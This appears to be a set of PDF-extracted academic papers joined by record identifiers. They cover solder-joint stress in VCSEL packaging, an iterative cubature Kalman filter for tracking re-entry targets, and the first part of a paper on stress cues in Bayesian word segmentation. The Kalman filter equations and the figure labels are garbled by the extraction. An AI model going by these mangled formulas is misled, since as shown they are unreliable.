estimated by Zemax using its powerful non-sequential module. The roughness of the reflection surface is close to the quality of mirror, and the maximum clear aperture is 50µm. Each laser source diode contains 1000 layout rays and 50000 analysis rays of 8mW. Table 1 Experience factors for convection by Ellison [10] Char. Plane. L k m Vertical plane height 1.22 0.35 Horizontal plane (face up) a 1.0 0.35 Horizontal plane(face down) a 05 0.33 Note: a = length×width/2×〔( length ＋ width )〕 0 50 100 150 200 0 50 100 150 200 250 300 T e m p e ra tu e r( o C ) Time(sec) 96.5Sn/3.5Ag 63Sn/37Pb (a) Temperature profile (b) Residual stress distribution Fig.3 Reflow process for VCSEL using Sn/37Pb solder joints. 3. Numerical results and discussion In the simulation, the process sequence is the reflow process followed by the acceleration aging test. The temperature profile of the reflow process is shown in figure 3(a). The time period for a VCSEL modulus is 3 minutes in the reflow process. According to Bellcore standard TA-TSA- 000983, the acceleration aging test in this study has a temperature of 85℃ maintained for 5000 hours. The residual stress distribution is then calculated and the corresponding displacement of VCSEL modulus is then estimated. The mechanic-thermal coupled field is adopted in the numerical analysis. The joints of VCSEL structure use Sn/37Pb or Sn/3.5Ag solder ball. The solder ball joint has a significant effect on the misalignment of the active region in view of deformation induced by the residual stresses. Figure 3(b) presents the residual stress distribution of Sn/37Pb solder joints used by the VCSEL modulus for the reflow process. After the reflow process, the maximum von Mises stresses is 28 Mpa and its position is marked by point P. It is found that point P is located at the interface between the solder joint and the pad, as shown in figure 3(b). As shown in figure 4, the stress variation of point P is calculated for the reflow process and the acceleration aging test which follows the reflow process. It is observed that the stress of point P is close to zero at the melting point of Sn/37Pb solder. In the solidification stage, the stress of point P rises up and finally come to a fixed value, the residual stress of point P. Similarly, the residual stress is 45.8 Mpa for Sn/3.5Ag solder joint. According to figure 4 (b), the stress relaxing caused by creeping is obvious. 0 50 100 150 200 0 5 10 15 20 25 30 v o n -M is e s S tr e s s (M P a ) Time(sec) Temperatuer von-Mises Stress 0 1000 2000 3000 4000 5000 0 5 10 15 20 25 30 P ru n c ip a l S tr e s s M a jo r ( M P a ) Time(hr) (a) Reflow process (b) Acceleration aging test Fig.4 Stress variation of the point P for Sn/37Pb solder joints. 0 50 100 150 200 0 10 20 30 40 50 T e m p e ra tu re (o C ) D is p la c e m e n t(  m ) Time(sec) Temperature Displacment 0 100 50 150 200 250 10 2 10 3 10 4 10 5 10 6 10 7 10 8 0 1 2 3 4 D is p la c e m e n t X ( m ) Time(sec) 0.155 0.140 (a) Reflow process (b) Acceleration aging test Fig.5 Displacement of point A of VCSEL using Sn/37Pb solder joints (a) Simulation model (b) Power distribution Fig. 6 Simulation of Zemax As shown in figure 6, the optical coupled power loss is simulated by Zemax. The fiber material is BK7, 125µm diameter and 4200µm length. The core material is SF11 with 40µm diameter and 4200µm long. In industry, the initial alignment of the VCSEL structure and fiber is set to have the greatest power transmitting efficiency. Then followed by the reflow process, the VCSEL structure and fiber are jointed. Generally, the optical coupled power loss will increase for each process or test. According to the numerical simulation, the center of the active region, point A, has the greatest PWS. The displacement and the corresponding optical coupled power loss are listed in table 2. According to the table, the displacement changes from 0.155µm to 0.140µm for the Sn/37Pb solder joints, and from 0.212µm to 0.184µm for the Sn/3.5Ag. However, the optical coupled power loss increases from 0.25% to 4% for the Sn/37Pb solder, and 1.875% to 5% for the Sn/3.5Ag solder. Table.2 Active region displacement (µm)/ Optical coupled power loss for different solder ball grid array joints Solder materials Sn/37Pb Sn/3.5Ag Reflow Process only 0.155 / 0.25% 0.212 / 1.875% Reflow Process +Aging test 0.140 / 4% 0.184 / 5% 4. Conclusions In this study, the residual stress distribution and the deformation for Sn/37Pb and Sn/3.5Ag ball grid array of VCSEL were investigated. The corresponding optical coupled power loss was estimated by the displacement from the finite element analysis. The simulated results reveal that both the post-solder-shift and the creep deformation may affect the coupling efficiency significantly. However, due to the high melting point, the Sn/3.5Ag ball grid array joint always provide the better coupling efficiency than the Sn/37Pb joint during the acceleration aging test. References [1] Melanie Ott, Harry Shaw, September 21, 2001,” Evaluation of Vertical Cavity Emitting Lasers (VCSEL) mounted on Diamond Substrates,” NASA/GSFC Component Technology and Radiation Effects Branch. [2] H. Roscher and R. Michalzik, "Low thermal resistance flip-chip bonding of 850 nm 2-D VCSEL arrays capable of 10 Gbit/s/ch operation", in Proc. IEEE Lasers and Electro-Opt. Soc. Ann. Meet., LEOS 2003, vol. 2, pp. 511−512. Tucson, AZ, USA, Oct. 2003 [3] R. Michalzik, R. King, R. Jäger, S. Müller, and K.J. Ebeling, "VCSEL arrays for CMOS integrated optical interconnect systems" (invited), in Optoelectronic and Wireless Data Management, Processing, Storage, and Retrieval, R. Raymond, P.K. Srimani, R. Su, and C.W. Wilmsen (Eds.), Proc. SPIE 4534, pp. 101−113, 2001. [4] Anderson, T. ,Guven, I., Madenci, E., and Gustafsson, G, 2000, “The Necessity of Reexamining Previous Life Prediction Analysis of Solder Joints in Electronic Packages,” IEEE, PP. 516-520. [5] Pardeep K. B., Klaus G., Kwang, A. Y., and Ahmer R. S., 1995, “Three-Dimensional Creep Analysis of Solder Joints in Surface Mount Devices,” Transactions of the ASME, vol.117 pp.20-25. [6] Amagai, M., 1999, “Characterization of Chip Scale Packaging Materials,” Microelectronics Reliability, Vol. 39, pp. 1365-1377. [7] Zarrow, P., 2000, soldering, SMT 101,pp.80-86. [8] Lau, J. H. and Pao , Y. H., 1997, Solder Joint Reliability of BGA, CSP, Flip Chip, and Fine Pitch SMT Assemblies, McGraw-Hill, New York, USA. [9] Ellison, Gordon N., Thermal Computations for Electronic Equipment, Robert E. Krieger Publishing Co., Malabar, Florida, 1989. work_5y7zlwyzhfcunhtjekvohrwboy ---- None work_5yrfjqd225fv7jchnnxplfrdgm ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 10 Levenberg-Marquardt Method Based Iterative Square Root Cubature Kalman Filter and its Applications to Maneuvering Re-entry Target Tracking Mu Jing School of Computer Science and Engineering Xi’an Technological University Xi’an, 710032, China e-mail: mujing1977@163.com Wang Changyuan School of Computer Science and Engineering Xi’an Technological University Xi’an, 710032, China e-mail: cyw901@163.com Abstract—Levenberg-Marquardt (abbr.L-M) method based iterative square root cubature Kalman filter (abbr. ISRCKFLM) inherits the numerical stability of square root Cubature Kalman filter and effectively suppresses the influence of the larger initial estimation error and the nonlinearity of the measurement equation on the state estimation in the nonlinear state estimation due to obtaining the optimal state and variance estimates using the latest measurement through L-M method. We apply the ISRCKFLM algorithm to the state estimation of maneuvering re-entry target tracking, the simulation results demonstrate that the ISRCKFLM algorithm has better accuracy of state estimation, comparable to Unscented Kalman filter and square root Cubature Kalman filter, according to estimation error analysis of the position, velocity, drag coefficient, turn coefficient and climbing force coefficient, and has fast convergence rate. Keywords-Nonlinear Filtering; Square Root Cubature Kalman Filter; Levenberg-Marquardt Method; Maneuvering Re- entry Targets Tracking I. INTRODUCTION The state estimate of maneuver re-entry target is highly non-linear filtering problem and has been much attention in the academic and engineering domain [1, 2]. Up to now, the commonly used non-linear filtering is the extended Kalman filter (EKF) [3]. The EKF is based on first-order Taylor approximations of state transition and observation equation about the estimated state trajectory under Gaussian assumption, so EKF may introduce significant bias, or even convergence problems due to the overly crude approximation [4]. Especially, for highly nonlinear problems such as state estimation of maneuver re-entry target, EKF may produce large filtering errors and even divergence. Based on the Unscented Transformation (UT), the Unscented Kalman filter (UKF) use a set of deterministic sampling points to approximate the posterior probability distribution of the system state, that is, the Sigma points are used to capture the mean and variance information of the state [5]. Recently, as a new way to solve the nonlinear estimation problem, cubature rules based cubature Kalman filter (CKF) proposed in [6] uses numerical multi-dimensional integral to approximate the recursive Bayesian estimation integrals under the Gaussian assumption. The CKF can solve high- dimensional nonlinear filtering problems with minimal computational effort. Then the square root cubature Kalman filter algorithm (SRCKF) was proposed in order to improve the numerical stability [6]. On the other hand, in order to decrease the effect of initial estimation error and nonlinearity of measurement equation, Levenberg-Marquardt method based iterative square root cubature Kalman filter (ISRCKFLM) was developed on the basis of the SRCKF in [7]. In this paper, we apply the ISRCKFLM algorithm to state estimation of maneuver re-entry target. Simulations demonstrate that the ISRCKFLM algorithm can greatly improve the tracking accuracy of maneuver re-entry target and obtain fast convergence, compared with the UKF and SRCKF algorithms. The rest of the paper is organized as follows. We begin with a description of the ISRCKFLM algorithm in Section 2. Then we apply the ISRCKFLM algorithm to track re-entry ballistic target (RBT) with unknown ballistic coefficient and discuss the simulation results in Section 3. Finally, we draw conclusion in Section 4. II. L-M BASED ITERATIVE SQUARE ROOT CUBATURE KALMAN FILTER Consider the following non-linear dynamics system:  1 1 ( ) k k k   x f x w    ( ) k k k  z h x v .  where f and h are some known nonlinear functions; xn k x and zn k z is state and the measurement vector, respectively; 1k  w and k v are process and measurement Gaussian noise sequences with zero means and covariance 1k  Q and k R , respectively, and 1 { } k  w and { } k v are mutually uncorrelated. Suppose that the state distribution at k-1 time is 1 1 1 1 ˆ( , ) T k k k k    x x S S , Levenberg-Marquardt based Iterative square root cubature Kalman filter (ISRCKFLM) is described as follows. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 11 A. Time Update 1) Calculate the cubature points and propagate the cubature points through the state equation  , 1 1 1 ˆ i k k i k    X S ξ x .   * , , 1 ( ) i k i k  X f X   where 2[1] , 1 , 1, 2 i i i x m m i m n   ξ ,the [1] i is a x n dimensional vector and is generated according to the way described in [2]. 2) Evaluate the predicted state and square root of the predicted covariance  * , 1 m k i i k i    x X    * , 1 ([ ]) k k Q k Tria  S χ S   here, , 1Q k  S denotes a square-root factor of 1k  Q and Tria() is denoted as a general triagularization algorithm. The matrix * k χ is defined as:  * * * * 1, 2, , 1 [ , , ] k k k k k m k k m   χ X x X x X x   3) Evaluate the modified covariance:  1 1T T T k k k k k k k i              P I S S S S I S S   where i  is adjusting parameter. B. Measurement update 1) Set the initial value as: (0)ˆ k k x x . 2) Assuming the i-th iterate ( )ˆ i k x , calculate the matrix  1 ( ) ( ) ( ) ( )ˆ ˆ ˆ( ) ( ) ( ) i T i i T i k k h k h k k h k k       L P J x J x P J x R   3) Calculate the i-th iterate      ( 1) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ˆ ˆ ˆ( ) ( )( ) ˆ ˆ( ) ( ) i i k k k i i i k k h k k k i i i i k h k k k k           x x L z h x J x x x I L J x P x x   4) Calculate the iteration termination condition  ( 1) ( )ˆ ˆi i k k    x x or max i N    and max N are predetermined threshold and maximum iterate number, respectively. If the termination condition meets, the iterate return to 5); otherwise, set ( ) ( 1)ˆ ˆ= i i k k  x x , continue to 2). 5) Calculate the state estimation at time instant  ( )ˆ ˆ N k k x x   6) Evaluate the cross-covariance and square root of innovation covariance at k time  ( )ˆ( ) T T N xz k k h k P S S J x    ( ) , ˆ( ( ) ) N zz h k k R k Chol    S J x S S   7) Calculate the square root of covariance at k time  / / T k xz zz zz K P S S    ( ) , ˆ( ( ) ) N k k k h k k k R k Chol    S S K J x S K S   where symbol “/ ” represents the matrix right divide operator. III. APPLICATIONS TO MANEUVERING REENTRY TARGET TRACKING In the simulation, the trajectory of the maneuvering re- entry generated in [8] is used with the same parameters, initial state and covariance estimation. To compare the performance of the ISRCKFLM with the UKF and SRCKF algorithms, we obtain the root mean square errors (RMSEs) in the position, velocity, drag coefficient, turn coefficient and climb coefficient showed in the Figure 1-5. All performance curves were obtained by averaging over 100 independent Monte Carlo runs. Table.1 lists the accumulated root mean square errors (ARMSEs). 05101520253035 0 50 100 150 200 250 Altitude/km R M S E i n p o s it io n /m UKF SRCKF ISRCKFLM Figure 1. RMSE in Position From Figur.1-2, we can see the ISRCKFLM’s RMSEs in positon and velocity are lower than those of UKF and SRCKF algorithms, especially, the RMSEs of ISRCKFLM 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 12 algorithm are effectively suppressed, and those of UKF and SRCKF algorithms have a big jump when the target experiences the high maneuver at altitude 23km and 10km. 05101520253035 0 100 200 300 400 500 600 700 800 900 1000 Altitude/km R M S E i n v e lo c it y /m s -1 UKF SRCKF ISRCKFLM Figure 2. RMSE in Velocity 05101520253035 0 0.2 0.4 0.6 0.8 1 1.2 Altitude/km R M S E i n d ra g c o e ff ic ie n t( 1 0 -3 )/ k g m -2 UKF SRCKF ISRCKFLM Figure 3. RMSE in Drag Coefficient 05101520253035 0 0.5 1 1.5 2 2.5 3 Altitude/km R M S E i n t u rn c o e ff ic ie n t( 1 0 -3 )/ k g m -2 UKF SRCKF ISRCKFLM Figure 4. RMSE in Turn Coefficient As for the estimate on drag coefficient, turn coefficient and climbing coefficient of maneuver re-entry target, from Figure.3-5we can see the RMSEs of three algorithms decrease between 35km-30km at altitude, and the RMSEs of three algorithms reach the smallest at about 30km at altitude. Then the RMSEs of three algorithms increases when a dive and turn maneuver occurs on re-entry target, however, the ISRCKFLM’s RMSEs are lower than those of the other two algorithms. The RMSEs of all filters gradually increase when the target experiences an increased climb force at altitude 16km-10km, but the ISRCKFLM’s RMSE increases slightly slower. After the maneuver was withdrawn, the RMSE of the three algorithms began to decline. 05101520253035 0 1 2 3 4 5 6 Altitude/km R M S E i n c li m b in g c o e ff ic ie n t( 1 0 -3 )/ k g  m -2 UKF SRCKF ISRCKFLM Figure 5. RMSE in Climbing Coefficient TABLE I. ARMSES IN THREE FILTERS Algori- thms ARMSEp /m ARMSEv /ms -1 ARMSEd/ kgm -2 ARMSEt /kgm -2 ARMSEc /kgm -2 UKF 42.3763 202.0984 0.000277 31 0.001000 4 0.001468 8 SRCKF 38.9467 184.3961 0.000251 65 0.000982 07 0.001386 5 ISRCKF LM 22.4556 141.8943 0.000218 02 0.000899 5 0.001186 1 Moreover, the ARMSEs of the ISRCKFLM in the positon, velocity, drag coefficient, turn coefficient and climbing coefficient are lower than those of UKF and SRCKF algorithms from Table.1. Therefore, on the basis of the simulation results presented in Figure.1-5, we can draw a conclusion that the ISRCKFLM yields on the superior performance over the UKF and SRCKF on the state estimation of maneuvering re-entry target. IV. CONCLUSION In this paper we apply the ISRCKFLM algorithm to maneuvering re-entry target tracking. The latest measurement are fully used in the ISRCKFLM algorithm, and innovation covariance and cross-covariance are improved in the iterative process, so we can obtain the optimal state estimation and covariance estimation. Simulation results demonstrate that the performance of ISRCKFLM algorithm is superior to UKF and CKF algorithms by analysis of errors in position, velocity, drag 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 13 coefficient, turn coefficient and climbing coefficient, and has the faster convergence rate. ACKNOWLEDGMENT The authors would like to thank the support of fund of the State and Local Joint Laboratory of Advanced Network and Monitoring Control Engineering (No.GSYSJ201603); Natural Science Basic Research Program of Department of science and technology of Shaanxi Province - Youth Foundation (No.2017JQ6056); The Key Project of Department of Education of Shaanxi Province (No.16JF012). REFERENCES [1] Li XR, Jilkov VP. A survey of maneuvering target tracking - part II: ballistic target models. Signal and Data Processing of Small Targets, 2001, 4473:559-581. [2] Farina A, Ristic B, Benvenuti D. Tracking a ballistic target: comparison of several nonlinear filters. IEEE Transactions on Aerospace and Electronic Systems, 2002, 38(3):854-867. [3] Bar-Shalom Y, Li XR, Kirubarajan T. Estimation with Applications to Tracking and Navigation. New York: John Wiley &Son, Inc, 2001. [4] Athans M, Wishner RP, Bertolini A. Suboptimal state estimation for continuous-time nonlinear system from discrete noisy measurements[J]. IEEE Transactions on Automatic Control, 1968, 13(5):504-514. [5] Julier SJ, Uhlmann JK. Unscented filtering and nonlinear estimation. Proceedings of the IEEE, 2004, 92(12):1958-1958. [6] Arasaratnam I, Haykin S. Cubature Kalman filters. IEEE Transactions on Automatic Control, 2009, 54(6):1254-1269. [7] Mu. J.; Cai. Y.; Wang. C.Y. L-M Method Based Iteration Cubature Kalman Filter and its Applications, Journal of Xi’an Technological University, 2013, 33(1):1-6. [8] Jing Mu, Yuanli Cai, Changyuan Wang. State estimation of Maneuvering Reentry Target Using Likelihood Based Iterated Divided Difference Filter, Journal of Xi’an Technological University, 32(5): 349-354, 2012.5. work_5z7jukcuuzcjpf3dkbskq4rrc4 ---- Exploring the Role of Stress in Bayesian Word Segmentation using Adaptor Grammars Exploring the Role of Stress in Bayesian Word Segmentation using Adaptor Grammars Benjamin Börschinger1,2 Mark Johnson1,3 1Department of Computing, Macquarie University, Sydney, Australia 2Department of Computational Linguistics, Heidelberg University, Heidelberg, Germany 3Santa Fe Institute, Santa Fe, USA {benjamin.borschinger|mark.johnson}@mq.edu.au Abstract Stress has long been established as a major cue in word segmentation for English infants. We show that enabling a current state-of-the-art Bayesian word segmentation model to take ad- vantage of stress cues noticeably improves its performance. We find that the improvements range from 10 to 4%, depending on both the use of phonotactic cues and, to a lesser ex- tent, the amount of evidence available to the learner. We also find that in particular early on, stress cues are much more useful for our model than phonotactic cues by themselves, consistent with the finding that children do seem to use stress cues before they use phono- tactic cues. Finally, we study how the model’s knowledge about stress patterns evolves over time. We not only find that our model cor- rectly acquires the most frequent patterns rel- atively quickly but also that the Unique Stress Constraint that is at the heart of a previously proposed model does not need to be built in but can be acquired jointly with word segmen- tation. 1 Introduction Among the first tasks a child language learner has to solve is picking out words from the fluent speech that constitutes its linguistic input.1 For English, stress has long been claimed to be a useful cue in infant word segmentation (Jusczyk et al., 1993; Jusczyk et al., 1999b), following the demonstra- 1The datasets and software to replicate our experiments are available from http://web.science.mq.edu.au/ ˜bborschi/ tion of its effectiveness in adult speech process- ing (Cutler et al., 1986). Several studies have investigated the role of stress in word segmenta- tion using computational models, using both neu- ral network and “algebraic” (as opposed to “statis- tical”) approaches (Christiansen et al., 1998; Yang, 2004; Lignos and Yang, 2010; Lignos, 2011; Lig- nos, 2012). Bayesian models of word segmenta- tion (Brent, 1999; Goldwater, 2007), however, have until recently completely ignored stress. The sole exception in this respect is Doyle and Levy (2013) who added stress cues to the Bigram model (Gold- water et al., 2009), demonstrating that this leads to an improvement in segmentation performance. In this paper, we extend their work and show how to integrate stress cues into the flexible Adaptor Gram- mar framework (Johnson et al., 2007). This allows us to both start from a stronger baseline model and to investigate how the role of stress cues interacts with other aspects of the model. In particular, we find that phonotactic cues to word-boundaries inter- act with stress cues, indicating synergistic effects for small inputs and partial redundancy for larger in- puts. Overall, we find that stress cues add roughly 6% token f-score to a model that does not account for phonotactics and 4% to a model that already in- corporates phonotactics. Relatedly and in line with the finding that stress cues are used by infants be- fore phonotactic cues (Jusczyk et al., 1999a), we ob- serve that phonotactic cues require more input than stress cues to be used efficiently. A closer look at the knowledge acquired by our models shows that the Unique Stress Constraint of Yang (2004) can be acquired jointly with segmenting the input instead 93 Transactions of the Association for Computational Linguistics, 2 (2014) 93–104. Action Editor: Stefan Riezler. Submitted 12/2013; Published 2/2014. c©2014 Association for Computational Linguistics. of having to be pre-specified; and that our models correctly identify the predominant stress pattern of the input but underestimate the frequency of iambic words, which have been found to be missegmented by infant learners. The outline of the paper is as follows. In Section 2 we review prior work. In Section 3 we introduce our own models. In Section 4 we explain our experimen- tal evaluation and its results. Section 5 discusses our findings, and Section 6 concludes and provides some suggestions for future research. 2 Background and related work Lexical stress is the “accentuation of syllables within words” (Cutler, 2005) and has long been ar- gued to play an important role in adult word recog- nition. Following Cutler and Carter (1987)’s obser- vation that stressed syllables tend to occur at the be- ginnings of words in English, Jusczyk et al. (1993) investigated whether infants acquiring English take advantage of this fact. Their study demonstrated that this is indeed the case for 9 month olds, al- though they found no indication of using stressed syllables as cues for word boundaries in 6 month olds. Their findings have been replicated and ex- tended in subsequent work (Jusczyk et al., 1999b; Thiessen and Saffran, 2003; Curtin et al., 2005; Thiessen and Saffran, 2007). A brief summary of the key findings is as follows: English infants treat stressed syllables as cues for the beginnings of words from roughly 7 months of age, suggesting that the role played by stress needs to be acquired, and that this requires antecedent segmentation by non- stress-based means (Thiessen and Saffran, 2007). They also exhibit a preference for low-pass filtered stress-initial words from this age, suggesting that it is indeed stress and not other phonetic or phono- tactic properties that are treated as a cue for word- beginnings (Jusczyk et al., 1993). In fact, phontactic cues seem to be used later than stress cues (Jusczyk et al., 1999a) and seem to be outweighed by stress cues (Mattys and Jusczyk, 2000). The earliest computational model for word seg- mentation incorporating stress cues we are aware of is the recurrent network model of Christiansen et al. (1998) and Christiansen and Curtin (1999). They only reported a word-token f-score of 44% (roughly, segmentation accuracy: see Section 4), which is considerably below the performance of subsequent models, making a direct comparison complicated. Yang (2004) introduced a simple incremental algo- rithm that relies on stress by embodying a Unique Stress Constraint (USC) that allows at most a sin- gle stressed syllable per word. On pre-syllabified child directed speech, he reported a word token f- score of 85.6% for a non-statistical algorithm that exploits the USC. While the USC has been argued to be near-to-universal and follows from the “cul- minative function of stress” (Fromkin, 2001; Cutler, 2005), the high score Yang reported crucially de- pends on every word token carrying stress, including function words. More recently, Lignos (2010, 2011, 2012) further explored Yang’s original algorithm, taking into account that function words should not be assumed to possess lexical stress cues. While his scores are in line with those reported by Yang, the importance of stress for this learner were more modest, providing a gain of around 2.5% (Lignos, 2011). Also, the Yang/Lignos learner is unable to acquire knowledge about the role stress plays in the language, e.g. that stress tends to fall on particular positions within words. Doyle and Levy (2013) extend the Bigram model of Goldwater et al. (2009) by adding stress- templates to the lexical generator. A stress-template indicates how many syllables the word has, and which of these syllables (if any) are stressed. This allows the model to acquire knowledge about the stress patterns of its input by assigning different probabilities to the different stress-templates. How- ever, Doyle and Levy (2013) do not directly exam- ine the probabilities assigned to the stress-templates; they only report that their model does slightly prefer stress-initial words over the baseline model by cal- culating the fraction of stress-initial word types in the output segmentations of their models. They also demonstrate that stress cues do indeed aid segmen- tation, although their reported gain of 1% in token f-score is even smaller than that reported by Lig- nos (2011). Our own approach differs from theirs in assuming phonemic rather than pre-syllabified in- put (although our model could, trivially, be run on syllabified input as well) and makes use of Adap- tor Grammars instead of the Goldwater et al. (2009) Bigram model, providing us with a flexible frame- work for exploring the usefulness of stress in differ- 94 ent models. Adaptor Grammar (Johnson et al., 2007) is a grammar-based formalism for specifying non- parametric hierarchical models. Previous work ex- plored the usefulness of, for example, syllable- structure (Johnson, 2008b; Johnson and Goldwa- ter, 2009) or morphology (Johnson, 2008b; Johnson, 2008a) in word segmentation. The closest work to our own is Johnson and Demuth (2010) who investi- gate the usefulness of tones for Mandarin phonemic segmentation. Their way of adding tones to a model of word segmentation is very similar to our way of incorporating stress. 3 Models We give an intuitive description of the mathemati- cal background of Adaptor Grammars in 3.1, refer- ring the reader to Johnson et al. (2007) for technical details. The models we examine are derived from the collocational model of Johnson and Goldwater (2009) by varying three parameters, resulting in 6 models: two baselines that do not take advantage of stress cues and either do or do not use phonotactics, as described in Section 3.2; and four stress models that differ with respect to the use of phonotactics, and as to whether they embody the Unique Stress Constraint introduced by Yang (2004). We describe these models in section 3.3. 3.1 Adaptor Grammars Briefly, an Adaptor Grammar (AG) can be seen as a probabilistic context-free grammar (PCFG) with a special set of adapted non-terminals. We use un- derlining to distinguish adapted non-terminals ( X ) from non-adapted non-terminals ( Y ). The distri- bution for each adapted non-terminal X is drawn from a Pitman-Yor Process which takes as its base- distribution the tree-distribution over trees rooted in X as defined by the PCFG. As an effect, each adapted non-terminal can be seen as having associ- ated with it a cache of previously-generated subtrees that can be reused without having to be regenerated using the individual PCFG rules. This allows AGs to learn reusable sub-trees such as words, sequences of words, or smaller units such as Onsets and Codas. Thus, while ordinary PCFGs have a finite number of parameters (one probability for each rule), Adap- tor Grammars in addition have a parameter for every possible complete tree rooted in any of its adapted non-terminals, leading to a potentially infinite num- ber of such parameters. The Pitman-Yor Process in- duces a rich-get-richer dynamics, biasing the model towards identifying a small set of units that can be reused as often as possible. In the case of word seg- mentation, the model will try to identify as compact a lexicon as possible to segment the unsegmented input. 3.2 Baseline models Our starting point is the state-of-the-art AG model for word segmentation, Johnson and Goldwater (2009)’s colloc3-syll model, reproduced in Fig- ure 1.2 The model assumes that words are grouped into larger collocational units that themselves can be grouped into even larger collocational units. This accounts for the fact that in natural language, there are strong word-to-word dependencies that need to be accounted for if severe undersegmentations of the form “is in the” are to be avoided (Goldwater, 2007; Johnson and Goldwater, 2009; Börschinger et al., 2012). It also uses a language-independent form of syllable structure to constrain the space of possi- ble words. Finally, this model can learn word-initial onsets and word-final codas. In a language like En- glish, this ability provides additional cues to word- boundaries as certain onsets are much more likely to occur word-initially than medially (e.g. “bl” in “black”), and analogously for certain codas (e.g. “dth” in “width” or “ngth” in “strength”). We define an additional baseline model by replac- ing rules (5) and (6) by (17), and deleting rules (7) to (12). This removes the model’s ability to use phono- tactic cues to word-boundaries. Word → Syll ( Syll ) ( Syll ) ( Syll ) (17) We refer to the model in Figure 1 as the colloc3- phon model, and the model that results from sub- stituting and removing rules as described as the colloc3-nophon model. Alternatively, one could limit the models ability to capture word-to-word de- pendencies by removing rules (1) to (3). This results 2We follow Johnson and Goldwater (2009) in limiting the length of possible words to four syllables to speed up runtime. In pilot experiments, this choice did not have a noticeable effect on segmentation performance. 95 Collocations3 → Collocation3 + (1) Collocation3 → Collocation2 + (2) Collocation2 → Collocation + (3) Collocation → Word + (4) Word → SyllIF (5) Word → SyllI ( Syll ) ( Syll ) SyllF (6) SyllIF → ( OnsetI ) RhymeF (7) SyllI → ( OnsetI ) Rhyme (8) SyllF → ( Onset ) RhymeF (9) CodaF → Consonant + (10) RhymeF → Vowel ( CodaF ) (11) OnsetI → Consonant + (12) Syll → ( Onset ) Rhyme (13) Rhyme → Vowel ( Coda ) (14) Onset → Consonant + (15) Coda → Consonant + (16) Figure 1: The baseline model. We use regular-expression notation to abbreviate multiple rules. X{n} stands for up to n repetitions of X , brackets indicate optionality, and X + stands for one or more repetitions of X . X indicates an adapted non-terminal. Rules that introduce terminals for the pre-terminals Vowel , Consonant are omitted. Refer to the main text for an explanation of the grammar. in the colloc-model (Johnson, 2008b) that has previ- ously been found to behave similarly to the Bigram model used in Doyle and Levy (2013) (Johnson, 2008b; Börschinger et al., 2012). We performed ex- periments with the colloc-model as well and found similar results to Doyle and Levy (2013) which are, while overall worse, similar in trend to the results obtained for the colloc3-models. For the rest of the paper, therefore, we will focus on variants of the colloc3-model. 3.3 Stress-based models In order for stress cues to be helpful, the model must have some way of associating the position of stress with word-boundaries. Intuitively, the reason stress helps infants in segmenting English is that a stressed syllable is a reliable indicator of the beginning of a word (Jusczyk et al., 1993). More generally, if there is a (reasonably) reliable relationship between the position of stressed syllables and beginnings (or Word →{SSyll | USyll}{1,4} (18) SSyll → ( Onset ) RhymeS (19) USyll → ( Onset ) RhymeU (20) RhymeS → Vowel ∗( Coda ) (21) RhymeU → Vowel ( Coda ) (22) Onset → Consonant + (23) Coda → Consonant + (24) Figure 2: Description of the all-stress-patterns model. We use X{m,n} for “at least m and at most n repetitions of X ” and {X | Y} for “either X or Y ”. Stress is asso- ciated with a vowel by suffixing it with the special termi- nal symbol ∗ , leading to a distinction between stressed ( SSyll ) and unstressed ( USyll ) syllables. A word can consist of any possible sequence of up to four syllables, as indicated by the regular-expression notation. By ad- ditionally adding initial and final variants of SSyll and USyll as in Figure 1, phonotactics can be combined with stress cues. endings) of words, a learner might exploit this rela- tionship. In a Bayesian model, this intuition can be captured by modifying the lexical generator, that is, the distribution that generates Word s. Here, changing the lexical generator corresponds to modifying the rules expanding Word . A straight- forward way to modify it accordingly is to enu- merate all possible sequences of stressed and un- stressed syllables.3 A lexical generator like this is given in Figure 2. In the data, stress cues are rep- resented using a special terminal “∗” that follows a stressed vowel, as illustrated in Figure 3. In the grammar, “∗” is constrained to only surface follow- ing a Vowel , rendering a syllable in which it occurs stressed ( SSyll ). Syllables that do not contain a “∗” are considered unstressed ( USyll ). By performing inference for the probabilities assigned to the dif- ferent expansions of rule (18), our models can, for example, learn that a bi-syllabic word that is stress- initial (a trochee) is more probable than one that puts stress on the second syllable (an iamb). This (partly) captures the tendency of English for stress-initial words and thus provide an additional cue for identi- fying words; and it is exactly the kind of preference infant learners of English seem to acquire (Jusczyk 3This is, in essence, also the strategy chosen by Doyle and Levy (2013). 96 grammar phon stress USC colloc3-nophon colloc3-phon • colloc3-nophon-stress • colloc3-phon-stress • • colloc3-nophon-stress-usc • • colloc3-phon-stress-usc • • • Table 1: The different models used in our experiments. “phon” indicates whether phonotactics are used, “stress” whether stress cues are used and “usc” whether the Unique Stress Constraint is assumed. orthographic the do-gie no-stress dh ah d ao g iy stress dh ah d ao * g iy Figure 3: Illustration of the input-representation we choose. We indicate primary stress according to the dic- tionary with bold-face in the orthography. The phonemic transcription uses ARPABET and is produced using an extended version of CMUDict. Primary stress is indi- cated by inserting the special symbol “*” after the vowel of a stressed syllable. et al., 1993). We can combine this lexical generator with the colloc3-nophon baseline, resulting in the colloc3- nophon-stress model. We can also add phonotac- tics to the lexical generator in Figure 2 by adding initial and final variants of SSyll and USyll , anal- ogous to rules (5) to (12) in Figure 1. This yields the colloc3-phon-stress model. We can also add the Unique Stress Constraint (USC) (Yang, 2004) by excluding all variants of rule (18) that generate two or more stressed syllables. For example, while the lexical generator for the colloc3-nophon-stress model will include the rule Word → SSyll SSyll , the lexical generator embodying the USC lacks this rule. We refer to the models that include the USC as colloc3-nophon-stress-usc and colloc3-phon-stress- usc models. A compact overview of the six different models is given in Table 1. 4 Experiments We evaluate our models on several corpora of child directed speech. We first describe the corpora we used, then the experimental methodology employed and finally the experimental results. As the trend is comparable across all corpora, we only discuss in detail results obtained on the Alex corpus. For com- pleteness, however, Table 3 reports the “standard” evaluation of performing inference over all of the three corpora. 4.1 Corpora and corpus creation Following Christiansen et al. (1998) and Doyle and Levy (2013), we use the Korman corpus (Korman, 1984) as one of our corpora. It comprises child- directed speech for very young infants, aged be- tween 6 and 16 weeks and, like all other cor- pora used in this paper, is available through the CHILDES database (MacWhinney, 2000). We de- rive a phonemicized version of the corpus using an extended version of CMUDict (Carnegie Mellon University, 2008)4, as we were unable to obtain the stress-annotated version of this corpus used in previ- ous 